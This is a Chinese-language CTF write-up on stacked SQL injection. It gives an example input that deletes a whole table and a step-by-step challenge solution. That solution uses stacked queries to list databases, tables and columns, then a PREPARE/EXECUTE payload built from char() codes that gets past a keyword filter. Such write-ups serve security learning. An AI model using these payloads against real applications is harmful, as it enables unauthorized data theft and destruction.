堆叠注入
在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FROM products服务器端生成的sql语句为:(因未对输入的参数进行过滤)Select * from products where productid=1;DELETE FROM products当执行查询后,第一条显示查询信息,第二条则将整个表进行删除。
访问
输入1
输入1’
发现报错,构造1’ order by 2 # 发现3时报错,说明字段为2
查看回显
1’ union select 1,2 #
返回一个正则过滤规则,可以看到几乎所有常用的字段都被过滤了
尝试堆叠注入
1';show databases;#
查看表
1';show tables;#
查看字段
1';show columns from words;#
使用预定SQL查询
PREPARE name from '[my sql sequece]'; //预定义SQL语句
EXECUTE name; //执行预定义SQL语句
(DEALLOCATE || DROP) PREPARE name; //删除预定义SQL语句
char()
cancat() //连接字符
char(115,101,108,101,99,116)<----->'select'
1';PREPARE name from concat(char(115,101,108,101,99,116), ' * from `1919810931114514` ');EXECUTE name;#
